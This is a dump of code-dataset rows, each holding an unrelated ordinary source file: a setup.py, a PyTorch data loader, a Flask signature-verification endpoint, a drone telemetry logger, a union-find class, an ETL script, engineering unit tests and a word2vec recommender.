index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
8,100 | 58438a1fb0b9e620717ba262c25a43bfbf6b8824 | __author__ = 'tcaruso'
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import glob
import fnmatch
import os
import sys
import warnings
from shutil import rmtree
from setuptools import find_packages, setup, Command
from collections import namedtuple
# parse_requirements moved to pip._internal in pip >= 10; fall back to the
# old location for older pips, and fail loudly on anything else.
try:
    from pip._internal.req import parse_requirements
except ImportError:
    from pip.req import parse_requirements
except Exception:
    from pip import __version__ as __pip_version__
    msg = """Sorry, could not install due to a pip import error. Please open an issue on the repo
with this message and the error so it can be addressed.
    pip version: {}
    python version: {}
""".format(__pip_version__, '.'.join(map(str, sys.version_info)))
    # BUG FIX: sys.version_info is a tuple of ints (and a str), so the original
    # '.'.join(sys.version_info) raised TypeError and masked the real message.
    raise EnvironmentError(msg)
# Absolute path of the directory containing this setup.py (used by UploadCommand).
here = os.path.abspath(os.path.dirname(__file__))

# ------------------------------------------------
# Package meta-data.
# PACKAGE_NAME is the name of the package directory and the import path. If you use my_package then when installed, you
# will import the package like `import my_package`.
PACKAGE_NAME = 'socket_wait'
DESCRIPTION = 'Listen on a port until a connection is received.'
URL = 'https://github.com/tomplex/socket_wait'
EMAIL = 'carusot42@gmail.com'
AUTHOR = 'Tom Caruso'
# The minimum Python version required, as a sys.version_info-style tuple.
REQUIRES_PYTHON = (2, 7, 0)
# PYPI_NAME is the name of the package on PyPI. Here it is simply PACKAGE_NAME
# (the original comment about a pbvt_ prefix was stale).
PYPI_NAME = '{}'.format(PACKAGE_NAME)
# ------------------------------------------------
# Check Python version we're installing against. Bail if it's not correct. This will blow up both when we build the
# package and when someone tries to install it.
if sys.version_info < REQUIRES_PYTHON:
    # Raise if we're trying to install on an unsupported Python version.
    raise Exception("Package {} requires python >= {}.".format(PYPI_NAME, '.'.join(map(str, REQUIRES_PYTHON))))
# Rebind REQUIRES_PYTHON to the pip-style specifier string expected by setuptools.
REQUIRES_PYTHON = '>=' + '.'.join(map(str, REQUIRES_PYTHON))

# ------------------------------------------------
# Read the version from the package itself so it is defined in exactly one place.
about = {}
from socket_wait import __version__
about['__version__'] = __version__
class UploadCommand(Command):
    """Support setup.py upload.

    Registered as the `upload` command in setup() below: cleans old build
    artifacts, builds sdist + universal wheel, and uploads them with twine.
    """

    # Shown by `python setup.py --help-commands`.
    description = 'Build and publish the package.'
    # This command accepts no command-line options.
    user_options = []

    def initialize_options(self):
        # Required by the setuptools Command interface; nothing to do.
        pass

    def finalize_options(self):
        # Required by the setuptools Command interface; nothing to do.
        pass

    @staticmethod
    def status(s):
        """Prints things in bold."""
        print('\033[1m{0}\033[0m'.format(s))

    def run(self):
        # Remove previous build output; ignore the error if dist/ is absent.
        try:
            self.status('Removing previous builds…')
            rmtree(os.path.join(here, 'dist'))
        except OSError:
            pass
        self.status("Installing required build packages...")
        os.system('{0} -m pip install wheel twine'.format(sys.executable))
        self.status('Building Source and Wheel (universal) distribution…')
        os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
        self.status('Uploading the package to pypi via Twine…')
        os.system('{0} -m twine upload dist/* '.format(sys.executable))
        # Stop here so setuptools does not run any further commands.
        sys.exit()
setup(
    name=PYPI_NAME,
    version=about['__version__'],
    description=DESCRIPTION,
    author=AUTHOR,
    author_email=EMAIL,
    url=URL,
    # Single-module distribution (socket_wait.py), not a package directory.
    py_modules=['socket_wait'],
    include_package_data=True,
    # If your package has a CLI component, specify it in entry_points.
    # For example, if you want it to be called like "mycli" from the command line, and the command line entry
    # point lives in the somepackage/cli.py file, in the function main, you'd construct it like this:
    entry_points={
        'console_scripts': ['socket_wait=socket_wait:cli'],
    },
    classifiers=[
        # Trove classifiers
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: Implementation :: CPython',
    ],
    # setup.py publish support (see UploadCommand above).
    cmdclass={
        'upload': UploadCommand,
    },
)
|
8,101 | 8a0a98ab072e46463d80d8638c830e6db0032a77 | import cv2
import random
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
from torch.utils.data import Dataset
from torchvision import transforms
class ShanghaiTechPartA(Dataset):
    """PyTorch dataset for ShanghaiTech Part-A crowd-counting data.

    `root` is an `images` directory; the matching ground-truth density maps
    are read from the sibling `density_maps` directory (same file names with
    a `.npy` extension).
    """

    def __init__(self, root, shuffle=False, transform=None, downsample=1):
        self.root = root
        self.shuffle = shuffle
        # Applied to the image tensor only, never to the density map.
        self.transform = transform
        # Output stride of the model; image/density map are shrunk to match.
        self.downsample = downsample
        self.image_names = os.listdir(self.root)
        self.n_samples = len(self.image_names)
        if self.shuffle:
            random.shuffle(self.image_names)

    def __len__(self):
        return self.n_samples

    def __getitem__(self, index):
        # BUG FIX: was `index <= len(self)`, which let index == len(self)
        # pass the assert and fail later with an IndexError.
        assert index < len(self), 'index range error'
        img_name = self.image_names[index]
        # Read image and normalize its pixels to [0, 1].
        img = plt.imread(os.path.join(self.root, img_name)) / 255
        # Expand a grayscale image to three identical channels.
        if len(img.shape) == 2:
            img = img[:, :, np.newaxis]
            img = np.concatenate((img, img, img), 2)
        # Read ground-truth density map stored alongside the images.
        density_map = np.load(os.path.join(self.root.replace('images', 'density_maps'),
                                           img_name.replace('.jpg', '.npy')))
        # Downsample image and density map to match the model's input/output.
        if self.downsample > 1:
            rows = int(img.shape[0] // self.downsample)
            cols = int(img.shape[1] // self.downsample)
            # Crop/resize image dims to an exact multiple of the factor.
            img = cv2.resize(img, (cols * self.downsample, rows * self.downsample))
            img = img.transpose((2, 0, 1))  # HWC -> CHW
            # Shrink the density map; rescale so the summed count is preserved.
            density_map = cv2.resize(density_map, (cols, rows))
            density_map = density_map[np.newaxis, :, :] * self.downsample * self.downsample
        # NOTE(review): when downsample <= 1 the image stays in HWC order and
        # the density map gets no channel axis -- confirm callers always use
        # downsample > 1 (preserved as-is to avoid changing behavior).
        img_tensor = torch.tensor(img, dtype=torch.float)
        density_map_tensor = torch.tensor(density_map, dtype=torch.float)
        if self.transform is not None:
            img_tensor = self.transform(img_tensor)
        return img_tensor, density_map_tensor
# Test code
if __name__ == "__main__":
    # Smoke test: load one random sample with ImageNet normalization and
    # an 8x downsample (hard-coded local dataset path).
    root = '/Users/pantelis/Downloads/archive/ShanghaiTech/part_A/train_data/images'
    dataset = ShanghaiTechPartA(root,
                                transform=transforms.Normalize(
                                    mean=[0.485, 0.456, 0.406],
                                    std=[0.229, 0.224, 0.225]),
                                downsample=8)
    # BUG FIX: randint is inclusive on both ends, so the original
    # randint(0, len(dataset)) could draw len(dataset), an out-of-range index.
    index = random.randint(0, len(dataset) - 1)
    img, dmap = dataset[index]
    print(index, img.shape, dmap.shape)
|
8,102 | a3662b4b9569046e67c39c1002234c1fbd85c650 | # Name: BoardingPass.py
# Description: Class to create and output a boarding pass
# Ver. Writer Date Notes
# 1.0 Shuvam Chatterjee 05/22/20 Original
from random import randint
class BoardingPass:
    """Builds boarding passes for every (flight, passenger) pair of a
    reservation and appends them to a shared text file.

    `reservation` is expected to provide getFlights() and getPassengers();
    each passenger provides getSeats() indexed in flight order.
    """

    def __init__(self, reservation):
        self.reservation = reservation
        # Passes are written to disk immediately on construction.
        self.export()

    def export(self):
        """Append one pass per passenger per flight; return the file path."""
        fileName = "reservations/data_reservation/boarding_passes"
        flights = self.reservation.getFlights()
        string = ""
        for i, flight in enumerate(flights):
            # One randomly assigned gate per flight.
            gate = randint(1, 8)
            for passenger in self.reservation.getPassengers():
                # BUG FIX: "BOARDING PASS" and the SEAT line were missing
                # their trailing newlines, fusing with the following line.
                string += "BOARDING PASS\n"
                string += "NAME OF PASSENGER:\n"
                string += passenger.getLastName() + " / " + passenger.getFirstName() + "\n"
                string += "FROM: " + flight.getOrigin() + "\n"
                string += "TO: " + flight.getDestination() + "\n"
                string += "SEAT: " + passenger.getSeats()[i] + "\n"
                string += "GATE: " + str(gate) + "\n"
                string += "\n\n"
        # `with` guarantees the handle is closed even if a getter raises.
        with open(fileName, "a") as file:
            print(string, file=file)
        return fileName
8,103 | bc9718fa57046888961d1b5245abefa8f752e983 | import hashlib
import os
def fileMD(self):
    """Print and return the salted MD5 hex digest of ``self.theFile``.

    NOTE(review): the salt is random and never stored, so the digest cannot
    be re-verified later, and MD5 is cryptographically broken -- prefer
    hashlib.sha256 with a persisted salt if this protects anything sensitive.
    """
    salt_ = os.urandom(32).hex()
    hash_object = hashlib.md5()
    hash_object.update(('%s%s' % (salt_, self.theFile)).encode('utf-8'))
    digest = hash_object.hexdigest()
    print("MD5 Hash: " + digest)
    # Return the digest (previously discarded) so callers can use the value;
    # callers that ignored the old None return are unaffected.
    return digest
8,104 | 43ecb173e3d306284f2122410b5b74945572f683 | #!/usr/bin/env python
#coding:utf-8
'''
Created on 2016年8月29日
@author: lichen
'''
def custom_proc(request):
    """Custom Django context processor.

    Ignores `request` and exposes a fixed test value to every template.
    """
    context = {"context_test": "test"}
    return context
8,105 | 9ae7b6d081529a5c70b7362c852647b3638e7e98 | print ("Hello"*5)
|
8,106 | 71c6d5e385e3db8444d7ef8b0231e72db8538eb7 | """
TODO: update description after everything (requirements) is (are) stable/concrete
Description: Script to extract KeepingTrac's creative names and send
team notification to start manual mapping as necessary.
This step must happen BEFORE the processing of deduping of RenTrak
creative names (step 2 in RenTrak processing).
"""
import pandas as pd
from mailer import Mailer
from vertica_utils import *
from s3_utils import *
def notify_for_manual_mapping(file, process_name):
    """Return the HTML email body asking the team to fill in missing
    kt_creative mappings and reload them via DataVault.

    file: name of the attached Excel file referenced in the instructions
          (shadows the `file` builtin; kept to preserve the interface).
    process_name: process_switches row the team must set back to run = 1.
    """
    email_str = """
    <p>Python script extracted new creative names from KeepingTrac data.</p>
    <p>To run the rest of the RenTrak ETL process smoothly, please do the followings:
    <ol>
    <li>download the attached file, <b>{0}</b>, from this email</li>
    <li>fill up empty (nan/NULL) kt_creative mappings under column C (kt_creative_clean) in that file</b></li>
    <li>upload the modified file to the S3 location below
    <span style="color: red;">(replace any file with the same name in the S3 folder, if any)</span>:<br>
    <b>diap.prod.us-east-1.target/RenTrak/CreativeCleaned</b>
    </li>
    <li>run this feed in DataVault: <b>InCampaign KT Creative Mappings</b></li>
    <li><span style="color: red;">AFTER the DataVault feed successfully loaded the mappings</span>,
    run this SQL in Vertica backend: <br>
    <b>
    UPDATE gaintheory_us_targetusa_14.incampaign_process_switches
    SET run = 1
    WHERE process_name = '{1}';
    </b>
    </li>
    </ol>
    </p>
    <p><strong style="color: red;">NOTE: If you forget a step or more above, the second part of RenTrak processing
    may not produce correct results.</strong></p>
    """.format(file, process_name)
    return email_str
def notify_no_new_mapping_found():
    """Return the HTML email body for the nothing-to-do case (all creative
    names already mapped; step 2 will proceed automatically)."""
    email_str = """
    <p>Python script does not find any new creative names from keepingtrac data.
    Stage 2 of processing RenTrak data will begin when we load new data to RenTrak tables.
    </p>
    <p><b>No further action on your part is needed.</b></p>
    """
    return email_str
def send_notification_email(recipients, subject, body, attachment=None):
    """Send a notification email (optionally with one attachment) and log it."""
    mailer = Mailer()
    mailer.send_email(recipients, subject, body, attachment)
    print("Notification email sent.")
# Function to extract data from vertica into a pandas dataframe
def vertica_extract(query, columns, index=None):
with vertica_python.connect(**conn_info) as connection:
cur = connection.cursor()
cur.execute(query)
results = pd.DataFrame(cur.fetchall())
results.columns = columns
if index:
return results.set_index(index)
else:
return results
def set_flag_value(table_name, schema_name, flag_name, value):
    """Build the SQL that sets the `run` switch for one process row.

    flag_name is the `process_name` value in the switches table; value is
    the new run flag (0 = locked, 1 = may proceed). Arguments are
    interpolated directly into the SQL text, so pass trusted values only.
    """
    return """
        UPDATE {1}.{0}
        SET run = {3}
        WHERE process_name = '{2}';
        COMMIT;
    """.format(table_name, schema_name, flag_name, value)
def set_lock(table_name, schema_name, flag_name, value):
    """Execute the run-flag update against Vertica and commit it."""
    with vertica_python.connect(**conn_info) as connection:
        cur = connection.cursor()
        cur.execute(set_flag_value(table_name, schema_name, flag_name, value))
        # Explicit commit in addition to the COMMIT inside the SQL text.
        connection.commit()
def main():
    """Step 1 of the RenTrak ETL: pull KeepingTrac creative names from
    Vertica; if any lack a cleaned mapping, lock step 2 and email the team
    an Excel file to fill in; otherwise release the lock and notify."""
    # start_date = (today - datetime.timedelta(weeks=6, days=1)).strftime('%Y-%m-%d')
    schema_name = 'gaintheory_us_targetusa_14'
    mapping_table = 'incampaign_kt_creative_mappings'
    flag_table = 'incampaign_process_switches'
    flag = 'rentrak_kt_creative_cleaned'
    # Location of sources and destination files.
    # ROOT_FOLDER / ONSHORE_EMAIL_RECIPIENTS come from the star-imported utils.
    output_folder = ROOT_FOLDER + 'RenTrak'
    output_file = 'kt_creative_cleaned.xlsx'
    if not os.path.exists(output_folder):
        print("Creating a new local folder for export file:", output_folder)
        os.makedirs(output_folder)
    # Step 1: download all possible KT combinations and current matching cleaned creative names.
    extract_query = """
        SELECT Air_ISCI as kt_creative_id, Cmml_Title AS kt_creative, kt_creative_clean
        FROM {1}.incampaign_keepingtrac_all a
        LEFT JOIN {1}.{0} b
        ON a.Air_ISCI = b.kt_creative_id
        WHERE Air_ISCI IS NOT NULL
        GROUP BY a.Air_ISCI, a.Cmml_Title, kt_creative_clean
        ORDER BY kt_creative_id
    """.format(mapping_table, schema_name)
    df = vertica_extract(
        extract_query,
        ['kt_creative_id', 'kt_creative', 'kt_creative_clean']
    )
    # Number of creatives whose cleaned name is still NULL/NaN.
    unmapped_creatives = df.isnull().sum()['kt_creative_clean']
    if unmapped_creatives > 0:
        print("Some unmapped kt_creatives found")
        print("Acquiring process lock:", flag, "so that the second part of RenTrak processing cannot proceed")
        set_lock(flag_table, schema_name, flag, 0)
        file_to_export = os.path.join(output_folder, output_file)
        # Export only the rows that still need manual mapping.
        df[df['kt_creative_clean'].isnull()].to_excel(file_to_export, index=False)
        # Send email to tell the team to start manual mapping.
        subject = "RenTrak automated processing step 1: new kt_creatives need to be mapped"
        body = notify_for_manual_mapping(output_file, flag)
        send_notification_email(ONSHORE_EMAIL_RECIPIENTS, subject, body, file_to_export)
        print("Notified the team to add manual mapping")
        os.remove(file_to_export)
        print("Deleted local file=>", file_to_export)
    else:
        print("Everything is mapped")
        print("Releasing process lock:", flag, "so that the second part of RenTrak processing can proceed")
        set_lock(flag_table, schema_name, flag, 1)
        # Set flag to 1 and send email notification that mappings are complete.
        subject = "RenTrak automated processing step 1: kt_creatives are all mapped. Step 2 will automatically commence."
        body = notify_no_new_mapping_found()
        send_notification_email(ONSHORE_EMAIL_RECIPIENTS, subject, body)
        print("Notified the team that no further action on their part is required")
if __name__ == "__main__":
main()
|
8,107 | 6c0080aa62579b4cbdaf3a55102924bfe31ffb40 | #давайте напишем программу русской рулетки
import random
# Russian-roulette console game (user-facing strings are in Russian).
amount_of_bullets = int(input("Сколько вы хотите вставить патронов?"))
# The cylinder: 0 = empty chamber, 1 = loaded chamber.
baraban = [0, 0, 0, 0, 0, 0]
# Load the requested number of bullets into the first chambers.
# NOTE(review): input is unvalidated -- more than 6 bullets raises IndexError.
for i in range(amount_of_bullets):
    print(i)
    baraban[i] = 1
print("Посмотрите на барабан", baraban)
how_much = int(input("сколько раз вы собираетесь нажать на курок? "))
# Each trigger pull re-spins the cylinder and "fires" chamber 0.
for i in range(how_much):
    random.shuffle(baraban)
    if baraban[0] == 1:
        print("Бабах")
        exit()
    else:
        print('щелк')
|
8,108 | 9e751bbddabbec7c5e997578d99ef1b8c35efe06 | from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
    """Collects flight telemetry from a DJI Tello drone and dumps it to CSV."""

    def __init__(self):
        # Tello control object.
        self.tello = Tello()
        # Raw state strings sampled from the Tello during flight.
        self.__data = []
        # Attitude samples collected by run().
        self.__array = []
        # Flight time in milliseconds.
        self.tempoVoo = 420000
        '''
        ___Padrão para nome dos arquivos das tabelas___
        Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
        1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
        2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
        3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
        '''
        # Output file name following the convention described above
        # (table number _ scenario _ flight seconds).
        self.nomeArquivo = '2_tudoFechado_420'
        self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
                                          'yaw', 'vgx', 'vgy', 'vgz',
                                          'templ', 'temph', 'tof',
                                          'height', 'battery', 'barometer',
                                          'time', 'agx', 'agy', 'agz'])
        # NOTE(review): the triple-quoted block below is a dead string literal
        # containing an old threaded collector implementation; kept verbatim.
        '''
        self.__startCollector = False
        self.__endProgram = False
        threadCollector = threading.Thread(target=self.dataCollector, args=())
        threadCollector.daemon = False
        threadCollector.start()
        def dataCollector(self):
        while True:
        if self.__startCollector:
        self.__data.append(self.tello.get_states())
        if self.__endProgram:
        for item in self.__data:
        timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
        self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
        item[9], item[11], item[13], item[15], item[17], item[19],
        item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
        self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
        break
        '''

    def fly(self):
        # Fly for `tempoVoo` ms, continuously sampling the raw state string.
        self.tello.connect()
        self.tello.takeoff()
        timestampInicial = int(round(time.time() * 1000))
        timestampFinal = timestampInicial
        while ((timestampFinal - timestampInicial) < self.tempoVoo):
            try:
                timestampFinal = int(round(time.time() * 1000))  # timestamp at sample time
                self.__data.append(self.tello.get_states())
                if (not len(self.__data) % 20 == 0):
                    # Keep-alive command so the Tello does not auto-land on idle.
                    self.tello.send_command_without_return('command')
            except KeyboardInterrupt:
                print ('\n . . .\n')
                self.tello.end()
                break
        self.tello.land()
        self.tello.end()
        # Convert every raw state sample into one DataFrame row.
        for item in self.__data:
            # NOTE(review): the timestamp is stamped at dump time, not at
            # capture time, so all rows share nearly the same value.
            timestamp = int(round(time.time() * 1000))
            self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
                                             item[9], item[11], item[13], item[15], item[17], item[19],
                                             item[21], item[23], item[25], item[27], item[29], item[31]]
        self.__df.to_csv('{}.csv'.format(self.nomeArquivo))

    def stop(self):
        # Terminate the connection with the drone.
        self.tello.end()

    def run(self):
        # Short (~10 s) diagnostic flight printing battery level and samples.
        self.tello.connect()
        self.tello.takeoff()
        tempo1 = self.tello.get_flight_time()
        tempo1 = tempo1[0:(len(tempo1)-1)]  # strip the trailing unit character
        #time.sleep(3)
        bateria = self.tello.get_battery()
        tempo2 = self.tello.get_flight_time()
        tempo2 = tempo2[0:(len(tempo2)-1)]
        print('Nivel da bateria é: {}'.format(str(bateria)))
        print('Tempo de início foi {}'.format(str(tempo1)))
        print('Tempo de término foi de {}'.format(str(tempo2)))
        # Sample attitude and state until 10 s of flight time have elapsed.
        while ((int(tempo2) - int(tempo1)) < 10):
            print('Nivel da bateria é: ' + str(bateria))
            self.__array.append(self.tello.get_attitude())
            self.__data.append(self.tello.get_states())
            tempo2 = self.tello.get_flight_time()
            tempo2 = tempo2[0:(len(tempo2)-1)]
        self.tello.land()
        self.tello.end()
        print(self.__array)
        print(self.__data)
def main():
    # Run one timed data-collection flight (duration set by DataTello.tempoVoo).
    dataTello = DataTello()
    dataTello.fly()
    #dataTello.stop()
if __name__ == "__main__":
main() |
class UF(object):
    """Weighted quick-union (union-find) with path halving.

    `len(uf)` reports the current number of disjoint components.
    """

    def __init__(self, n):
        # Every element starts as its own root, in a component of size 1.
        self.parents = list(range(n))
        self.weights = [1] * n
        self.n = n

    def find(self, i):
        """Return the root of i's component, halving the path on the way up."""
        root = i
        while root != self.parents[root]:
            # Point each visited node at its grandparent (path halving).
            self.parents[root] = self.parents[self.parents[root]]
            root = self.parents[root]
        return root

    def union(self, p, q):
        """Merge the components containing p and q (no-op if already joined)."""
        root_p = self.find(p)
        root_q = self.find(q)
        if root_p == root_q:
            return
        # Attach the lighter tree under the heavier one to keep trees shallow;
        # on a tie, q's root goes under p's root.
        if self.weights[root_p] < self.weights[root_q]:
            root_p, root_q = root_q, root_p
        self.parents[root_q] = root_p
        self.weights[root_p] += self.weights[root_q]
        self.n -= 1

    def is_connected(self, p, q):
        """True iff p and q share a root."""
        return self.find(p) == self.find(q)

    def __len__(self):
        """Number of disjoint components remaining."""
        return self.n
if __name__ == '__main__':
    # Smoke test: 10 singletons, three unions -> 7 components,
    # with {1, 2, 3, 4} merged into one.
    uf = UF(10)
    uf.union(1, 2)
    uf.union(3, 4)
    uf.union(2, 4)
    assert len(uf) == 7
    assert uf.is_connected(1, 4)
    assert not uf.is_connected(1, 5)
|
8,110 | acb9b6128a3432aecf3498e1d27bdff204fee0f4 | import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
    """Allowable-stress strength checks for RC beams/columns (calla.TB.RC_strength)."""

    def test1(self):
        """
        Reference check: worked example 1 from "Principles of Railway Concrete
        Structure Design (allowable-stress method)" lecture slides.
        """
        b = 200
        h0 = 411
        As = 763
        n = 15
        M = 31.5
        r = beam_strength.cal_σ1(b,h0,As,n,M)
        print('σc,σs,x = ',r)
        # Accept results within 1% of the published reference values.
        assert abs(r[0]-5.26)/5.26<0.01
        assert abs(r[1]-115.3)/115.3<0.01
        assert abs(r[2]-167.1)/167.1<0.01

    def test2(self):
        """
        Reference check: chapter 12 answers from "Fundamentals of Concrete
        Structures" (Lü Xiaoyin edition).
        """
        b = 250
        h = 350
        l0 = 5
        a = 40
        a_ = 40
        Ec = 3.0E4 #MPa
        As = 1017
        As_ = 1017
        n = 10
        M = 20 #kN
        N = 450
        r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
        print('σc,σs,σs\'\n',r)
        # Accept results within 1% of the published reference values.
        assert abs(r[0]-7.56)/7.56<0.01
        assert abs(r[2]-67.8)/67.8<0.01

    def test3(self):
        # Ad-hoc exploratory test (no reference values; prints results only).
        b = 600
        h0 = 937.5
        As = 3434.375
        n = 10
        M = 700
        V = 300
        r = beam_strength.cal_σ1(b,h0,As,n,M)
        s = beam_strength.shear_stress(b,h0,As,n,V)
        print('σc,σs,x = \n',r)
        print('τ = ',s)
        M1 = 10
        M2 = 10
        σs = r[1]
        Es = 2.0E5
        d = 28
        a = 62.5
        # Number of bars inferred from total steel area / single-bar area.
        n1 = As/(pi/4*d**2)
        wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)
        print('wf = ',wf)

    def test_column_strength(self):
        # Ad-hoc exploratory test (no reference values; prints results only).
        b = 1200
        h = 1200
        l0 = 5
        a = 90
        a_ = 90
        Ec = 3.45E4 #MPa
        As = 12316
        As_ = 12316
        n = 10
        M = 2800 #kN
        N = 14000
        r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
        print('σc,σs,σs\'\n',r)
if __name__ == '__main__':
    # Discover and run all test methods when executed as a script.
    unittest.main()
|
8,111 | 9d142e8de5235d55cd99371c9884e8dc7a10c947 | import os
from flask import (
Flask,
render_template,
request
)
# from flask_jwt_extended import JWTManager
from flask_login import LoginManager
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from flask_wtf.csrf import CSRFError, CSRFProtect
from config import Config
from log_config.custom_logger import logger
app = Flask(__name__)
# Config class path comes from the APP_SETTINGS env var, defaulting to Config.
app.config.from_object(os.environ.get('APP_SETTINGS', Config))
csrf = CSRFProtect(app)
login = LoginManager(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# jwt = JWTManager(app)

@app.errorhandler(404)
def not_found(error):
    """Log the missing URL and render the custom 404 page."""
    logger.warning(f'page not found {error} - {request.url}')
    return render_template('error_pages/404.html'), 404

@app.errorhandler(500)
def server_error(error):
    """Log the failing URL and render the custom 500 page."""
    logger.error(f'server error {error} - {request.url}')
    return render_template('error_pages/500.html'), 500

# Blueprints are imported here (after `app` exists) to avoid circular imports.
# from app.api.auth.controller import api_auth
from app.mod_auth.controller import mod_auth as auth_module
from app.mod_home.controller import mod_home as home_module
# app.register_blueprint(api_auth)
app.register_blueprint(auth_module)
app.register_blueprint(home_module)
# csrf.exempt(api_auth)
|
8,112 | be9c21ee04a612f711a1e6a82ea9478c77b62a82 | import ZooAnnouncerInterface
class ZooAnnouncer(ZooAnnouncerInterface):
    # NOTE(review): `ZooAnnouncerInterface` is imported as a *module*
    # (`import ZooAnnouncerInterface`), and a class cannot subclass a module --
    # this raises TypeError at class-creation time. The likely intent is
    # `from ZooAnnouncerInterface import ZooAnnouncerInterface`; confirm
    # against that module's contents before changing.
    def updateZoo(self,annoucement):
        # Observer callback: print the received zoo announcement.
        # (Parameter keeps the original "annoucement" spelling because
        # callers may pass it by keyword.)
        print("ZooAnnouncer :" + annoucement)
8,113 | 8bae45de54535e7b0788aa12717645ae9f193664 | from flask import Flask, request, jsonify
from flask_restful import Api
import json
import eth_account
import algosdk
app = Flask(__name__)
api = Api(app)
# Treat /verify and /verify/ as the same route.
app.url_map.strict_slashes = False

@app.route('/verify', methods=['GET','POST'])
def verify():
    """Verify that `sig` is a valid signature of the JSON-serialized
    `payload` by public key `pk`.

    Expected JSON body: {"sig": ..., "payload": {"message": ..., "pk": ...,
    "platform": "Ethereum" | <anything else -> Algorand>}}.
    Returns JSON true/false, or an explanatory string when no JSON was sent.
    """
    content = request.get_json(silent=True, force=True)
    # Check if signature is valid.
    print(content)
    if content == None:
        return jsonify("No json data is sent.")
    # NOTE(review): a missing/None `payload` raises AttributeError below and
    # surfaces as a 500 -- consider validating before use.
    sig = content.get('sig')
    payload = content.get('payload')
    message = payload.get('message')
    pk = payload.get('pk')
    platform = payload.get('platform')
    if platform == "Ethereum":
        # Recover the signer address from the EIP-191 encoded payload and
        # compare it with the claimed public key / address.
        encoded_msg = eth_account.messages.encode_defunct(text=json.dumps(payload))
        result = eth_account.Account.recover_message(encoded_msg,signature=sig) == pk
    else:
        # Algorand: verify the signature over the serialized payload bytes.
        result = algosdk.util.verify_bytes(json.dumps(payload).encode('utf-8'), sig, pk)
    return jsonify(result)

if __name__ == '__main__':
    app.run(port='5002')
|
8,114 | 04dc4d46a645a23913e33606c500037d37418cd7 | import numpy as np
import pandas as pd
from scipy import sparse, io
import cPickle as pickle
import sys
sys.path.append('code')
import models
import split
from itertools import chain
def test_simple_instance(items, item_numbers, negative_items, user):
    '''
    Train a Word2Vec recommender on all users' liked-item sequences and
    return the top-50 recommendations for `user` (1-based index).
    `negative_items` holds per-user disliked item ids stored as negated
    numbers; they are un-negated here before recommending.
    '''
    model = models.Word2VecRecommender(size=200, window=max(item_numbers), min_count=1)
    model.fit(items)
    user_items = items[user-1]
    #negative_items = [str(-1 * int(x)) for x in unliked_list[user-1]]
    # Disliked ids are stored negated; flip the sign back for the model.
    negative_items = [str(-1 * int(x)) for x in negative_items[user-1]]
    #negative_items=[]
    recommendations = model.recommend(user_items, negative_items, num_items=50)
    return recommendations
def test_simple_instance_test1(test_user, items, item_numbers, negative_items, user):
    '''
    Returns list of tuples representing item recommendations.
    - based on user's liked_list and disliked_list
    - contains cosine similarities of the recommendations
    - `test_user` is the user's held-out test-set DataFrame, used by
      model.recommend2 to filter candidates.
    '''
    model = models.Word2VecRecommender(size=200, window=max(item_numbers), min_count=1)
    model.fit(items)
    user_items = items[user-1]
    # Disliked ids are stored negated; flip the sign back for the model.
    negative_items = [str(-1 * int(x)) for x in negative_items[user-1]]
    final = model.recommend2(test_user, user_items, negative_items, num_items=100)
    return final # movieId
def extract_names(recommendations, movies_contents):
    '''
    Returns and prints the recommended movies' metadata (name and genre).
    `recommendations` is a list of (movieId, cosine similarity) tuples.
    '''
    recommended_list = list(zip(*recommendations)[0]) # movieId
    # Cast the string ids to int for DataFrame label lookup.
    recommended_list = [int(x) for x in recommended_list]
    extracted = movies_contents.ix[recommended_list,:]
    print extracted
    print '\n'
    return extracted
def examine_the_results2(final_extracted, rtmp, user):
    '''
    Returns the actual ratings of the recommended items from the user.
    Used for evaluating the performance of the recommender.
    `rtmp` is the sparse user x item ratings matrix.
    '''
    idx = final_extracted.index
    examine_list = []
    # Densify this user's ratings row into a flat list.
    rt = list(chain.from_iterable(rtmp[user-1].toarray().tolist()))
    for i in idx:
        # movieIds are 1-based; the densified row is 0-based.
        r = rt[i-1]
        examine_list.append(r)
    print examine_list
    return examine_list
def examine_the_results3(final_extracted, test_user, user):
    '''
    Returns the actual ratings of the recommended items from the user,
    looked up in the user's held-out test-set DataFrame.
    Used for evaluating the performance of the recommender.
    '''
    idx = final_extracted.index
    examine_list = []
    for i in idx:
        # NOTE(review): int() requires exactly one matching row; zero or
        # multiple test rows for movie `i` raise here.
        r = int( test_user[test_user['movieId'] == i].rating )
        examine_list.append(r)
    print examine_list
    return examine_list
def rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user):
    '''
    User-specific evaluation: recommend, print titles, print actual ratings.
    '''
    # NOTE(review): `test_user` is not a parameter of this function; this
    # only works when a module-level `test_user` global exists (as set up in
    # the __main__ block). Consider adding it to the signature.
    recommendations = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
    print recommendations
    # What are the names of the recommended movies?
    print "Recommended movies"
    extracted = extract_names(recommendations, movies_contents)
    print "User {}'s ratings on Recommended movis".format(user)
    examine_list = examine_the_results2(extracted, rtmp, user)
    return examine_list
